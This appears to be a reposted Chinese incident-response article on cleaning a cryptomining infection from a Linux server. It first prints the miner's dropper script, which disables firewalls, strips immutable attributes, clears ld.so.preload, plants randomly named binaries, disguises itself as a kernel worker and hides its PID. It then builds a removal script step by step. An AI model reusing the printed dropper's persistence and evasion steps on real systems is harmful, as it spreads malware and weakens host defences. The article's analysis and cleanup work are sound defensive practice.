扫码领资料
获网安教程
前期排查
#!/bin/bash# 删除当前用户的 crontab 任务crontab -r 2>/dev/null# 禁用 Uncomplicated Firewallufw disable 2>/dev/null# 设置 iptables 防火墙规则,允许所有入站、出站和转发的流量,清空 iptables 规则iptables -P INPUT ACCEPT 2>/dev/nulliptables -P OUTPUT ACCEPT 2>/dev/nulliptables -P FORWARD ACCEPT 2>/dev/nulliptables -F 2>/dev/null# 移除系统文件的不可修改属性chattr -i /usr/sbin/ >/dev/null 2>&1chattr -i /usr/bin/ >/dev/null 2>&1chattr -i /bin/ >/dev/null 2>&1chattr -i /usr/lib >/dev/null 2>&1chattr -i /usr/lib64 >/dev/null 2>&1chattr -i /usr/libexec >/dev/null 2>&1chattr -i /etc/ >/dev/null 2>&1chattr -i /tmp/ >/dev/null 2>&1chattr -i /sbin/chattr -i /etc/resolv.confchattr -i /etc/cron.d/systeml >/dev/null 2>&1chattr -i /etc/cron.weekly/systeml >/dev/null 2>&1chattr -i /etc/cron.hourly/systeml >/dev/null 2>&1chattr -i /etc/cron.daily/systeml >/dev/null 2>&1chattr -i /etc/cron.monthly/systeml >/dev/null 2>&1# 移除 ld.so.preload 文件的不可修改属性并清空文件内容chattr -ia /etc/ld.so.preload 2>/dev/nullcat /dev/null > /etc/ld.so.preload 2>/dev/null# 通过检查是否存在包含以前文件名的文件,生成或读取两个随机的文件名,并将它们保存在if [ -e "/usr/lib/systemd/previous_filenames1" ] && [ -e "/usr/lib/systemd/previous_filenames2" ]; thenread -r file1 < "/usr/lib/systemd/previous_filenames1"read -r file2 < "/usr/lib/systemd/previous_filenames2"elsefile1="/bin/$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)"file2="/bin/$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)"echo "$file1" > "/usr/lib/systemd/previous_filenames1"echo "$file2" > "/usr/lib/systemd/previous_filenames2"fimv x86_64 "$file1" 2>/dev/nullmv i386 "$file2" 2>/dev/null# 设置变量SERVICE="kworker2:0H"EXEC="kworker2:0H"DIR="/tmp"# 移除某些文件的不可修改、不可删除、不可设置属性chattr -iaus /etc/cron.*/$EXEC /etc/init.d/$EXEC 2>/dev/null# Check if the process is runningif P=$(pgrep -F /bin/.locked) >> /dev/null; thenecho "Running" && exitelseecho "Not running"echo -n > /bin/.locked# Copy the files to the temporary directorycp "$file1" "$DIR/$EXEC" 2>/dev/nullcp "$file2" "$DIR/neo" 2>/dev/nullchmod +x "$DIR/$EXEC" 2>/dev/nullchmod +x "$DIR/neo" 2>/dev/null"$DIR/$EXEC" --tls >/dev/null 2>&1rm -rf "$DIR/$EXEC"fisleep 2# Check if the process is running and update the lock fileif P1=$(pgrep "$EXEC") 2>/dev/null; thenecho $P1 > /bin/.locked 2>/dev/nullfi# Execute the command using the value stored in the lock file"$DIR/neo" "$(cat /bin/.locked)" 2>/dev/null/bin/nuBrWiVa
-
/usr/lib/systemd/previous_filenames1 -
/usr/lib/systemd/previous_filenames2 -
/bin/.locked
专杀脚本编写
总结病毒特点
梳理特点关联性
分块编写代码
if [ -e /bin/.locked ]; thenp=$(cat /bin/.locked)read -ra PID <<< "$p"for pid_value in "${PID[@]}"; doecho "[-] Processing PID: $pid_value"# 执行umount操作umount -l /proc/$pid_value# 查找并杀死与PID相关的进程(如果需要的话)a=$(ps -ef | grep $pid_value | grep "kworker2:0H")if [ -n "$a" ]; thenkill -9 $pid_valueecho "[+] Evil process with PID $pid_value killed"fidoneelseecho "[+] Nothging"fi
evil_cron=($(grep -r -l "root /bin/.*1 1" /etc/cron.*))for value in "${evil_cron[@]}"; doecho "[+] evil_cron: $value"rm -rf $valueecho "[+] evil_cron:$value 已删除"done
process_name=($(grep -rn "root /bin/.*1 1" /etc/cron.* | awk '{print $(NF-2)}'))echo "[+] process_name: $process_name"mv "$process_name" /tmp/evil_1112server_pid=($(ps -ef | grep $process_name | grep -v 'grep /bin' | awk '{print $2}'))for value in "${server_pid[@]}"; doecho "[+] server_pid: $value"doneserver_name=($(systemctl status $value | grep "Loaded:" | awk '{print $3}' | awk -F'/' '{print $NF}' | sed 's/;//'))for value in "${server_name[@]}"; doecho "[+] server_name: $server_name"breakdonesystemctl stop $server_namesystemctl disable $server_nameserver_path=/usr/lib/systemd/system/rm -rf $server_path$server_nameecho "server deleted"
file_path1="/usr/lib/systemd/previous_filenames1"if [ -e "$file_path1" ]; thenfile_content=$(cat "$file_path1")echo "File $file_path1 exists, and its content is: $file_content"mv "$file_content" /tmp/evil_1112elseecho "File $file_path1 does not exist."fifile_path2="/usr/lib/systemd/previous_filenames2"if [ -e "$file_path2" ]; thenfile_content=$(cat "$file_path2")echo "File $file_path2 exists, and its content is: $file_content"mv "$file_content" /tmp/evil_1112elseecho "File $file_path1 does not exist."fi
整合代码
hostnameif [ ! -d "/tmp/evil_1112" ]; thenmkdir /tmp/evil_1112fi#查找特征文件并备份file_path1="/usr/lib/systemd/previous_filenames1"if [ -e "$file_path1" ]; thenfile_content=$(cat "$file_path1")echo "[+] File $file_path1 exists, and its content is: $file_content"mv "$file_content" /tmp/evil_1112 2>/dev/nullelseecho "[+] File $file_path1 does not exist."fifile_path2="/usr/lib/systemd/previous_filenames2"if [ -e "$file_path2" ]; thenfile_content=$(cat "$file_path2")echo "File $file_path2 exists, and its content is: $file_content"mv "$file_content" /tmp/evil_1112 2>/dev/nullelseecho "File $file_path1 does not exist."fi#查找服务并停止process_name=($(grep -rn "root /bin/.*1 1" /etc/cron.* | awk '{print $(NF-2)}' | uniq))if [ -z "$process_name" ]; thenecho "[+] process name is not exist"elseecho "[+] process_name: $process_name"mv "$process_name" /tmp/evil_1112fievil_process=$(ps -ef | grep -E " /bin/w+{8}" | awk '{print $8}' | uniq)if [ -z "$evil_process" ]; thenecho "[+] evil process is not running"elseif [[ "$evil_process" == "$process_name" ]]; thenecho "[+] evil process $evil_process is running"server_pid=($(ps -ef | grep $process_name | grep -v 'color' | awk '{print $2}'))for value in "${server_pid[@]}"; doecho "[+] evil server_pid: $value"doneserver_name=($(systemctl status $value | grep "Loaded: loaded" | awk '{print $3}' | awk -F'/' '{print $NF}' | sed 's/;//'))for value in "${server_name[@]}"; doecho "[+] evil server_name: $server_name"breakdonesystemctl stop $server_namesystemctl disable $server_nameserver_path=/usr/lib/systemd/system/rm -rf $server_path$server_nameecho "[+] evil server deleted"elseecho "[+] evil process is not running"fifi#查找计划任务并删除evil_cron=($(grep -r -l "root /bin/.*1 1" /etc/cron.*))for value in "${evil_cron[@]}"; doecho "[+] evil cron: $value"rm -rf $valueecho "[+] evil cron:$value deleted"done#查找外联进程并killif [ -e /bin/.locked ]; thenp=$(cat /bin/.locked)read -ra PID <<< "$p"for pid_value in "${PID[@]}"; doecho "[-] Processing PID: $pid_value"# 执行umount操作umount -l /proc/$pid_value 2>/dev/null# 查找并杀死与PID相关的进程(如果需要的话)a=$(ps -ef | grep $pid_value | grep "kworker2")if [ -n "$a" ]; thenkill -9 $pid_valueecho "[+] Evil process with PID $pid_value killed"fidoneelseecho "[+] Nothging"fi
文章来源:https://www.freebuf.com/articles/network/390612.html文章作者:Xbxhjx如有侵权,联系删除
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
原文始发于微信公众号(白帽子左一):企业挖矿病毒处置实战——专杀脚本从0到1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论